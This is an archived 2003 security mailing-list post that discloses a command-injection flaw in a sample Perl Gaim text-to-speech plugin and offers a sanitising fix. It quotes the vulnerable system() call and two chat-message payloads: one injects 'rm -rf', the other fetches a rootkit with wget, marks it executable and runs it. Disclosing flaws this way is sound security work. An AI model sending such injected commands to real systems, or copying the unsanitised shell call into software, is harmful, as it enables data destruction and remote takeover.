Gaim festival plugin exploit

From: error (error_at_lostinthenoise.net)
Date: 10/15/03

  • Next message: Giovanni Campagnoli: "Microsoft Windows Security Bulletin Summary October"
    To: bugtraq@securityfocus.com, full-disclosure@lists.netsys.com
    Date: 15 Oct 2003 17:29:55 +0200
    
    
    

    It has come to my attention that people have actually used this example
    code for a gaim plugin:

    AIM::register("Festival TTS", "0.0.1", "goodbye", "");
    AIM::print("Perl Says", "Loaded Festival TTS");
    AIM::command("idle", "60000") if ($pro ne "Offline");
    AIM::add_event_handler("event_im_recv", "synthesize");

    sub goodbye {
            AIM::print("Module Unloaded", "Unloaded Festival TTS");
    }

    sub synthesize {
        my $string = $_[0];
        $string =~ s/\<.*?\>//g;
        $string =~ s/\".*\"//;
        system("echo \"$string\" | /usr/bin/festival --tts");
    }

    As taken from:
    http://www.webreference.com/perl/tutorial/13/aim_fest_plugin.pl

    This has to be one of the most amusing ways to gain a local users
    privileges I have ever seen by an "Expert (TM)"

    Exploit code?
    You have a shell through gaim with that.

    Just pass it this message (or really any message for that matter):

    Hey, I just wanted to exploit your box, do you mind?"; rm -rf;

    Or perhaps:

    Hey, grab this root kit for me?";wget http://url/to/rootkit;chmod +x
    rootkit;./rootkit

    Perhaps someone should ask:

    "(Is s/[^\w]//g really that hard to do?!)"

    So a fixed version would look like this:

    AIM::register("Festival TTS", "0.0.1", "goodbye", "");
    AIM::print("Perl Says", "Loaded Festival TTS");
    AIM::command("idle", "60000") if ($pro ne "Offline");
    AIM::add_event_handler("event_im_recv", "synthesize");

    sub goodbye {
            AIM::print("Module Unloaded", "Unloaded Festival TTS");
    }

    sub synthesize {
        my $string = $_[0];
        $string =~ s/\<.*?\>//g;
        $string =~ s/\".*\"//;
        $string =~ s/[^\w]//g;
        system("echo \"$string\" | /usr/bin/festival --tts");
    }

    Just a minor comment, nothing special.

    -- 
    error <error@lostinthenoise.net>
    
    



  • Next message: Giovanni Campagnoli: "Microsoft Windows Security Bulletin Summary October"

    Relevant Pages

    • [Full-Disclosure] Gaim festival plugin exploit
      ... It has come to my attention that people have actually used this example ... code for a gaim plugin: ... grab this root kit for me?";wget http://url/to/rootkit;chmod +x ...
      (Full-Disclosure)
    • Gaim festival plugin exploit
      ... It has come to my attention that people have actually used this example ... code for a gaim plugin: ... grab this root kit for me?";wget http://url/to/rootkit;chmod +x ...
      (Full-Disclosure)
    • [Full-Disclosure] Gaim festival plugin exploit
      ... It has come to my attention that people have actually used this example ... code for a gaim plugin: ... grab this root kit for me?";wget http://url/to/rootkit;chmod +x ...
      (Full-Disclosure)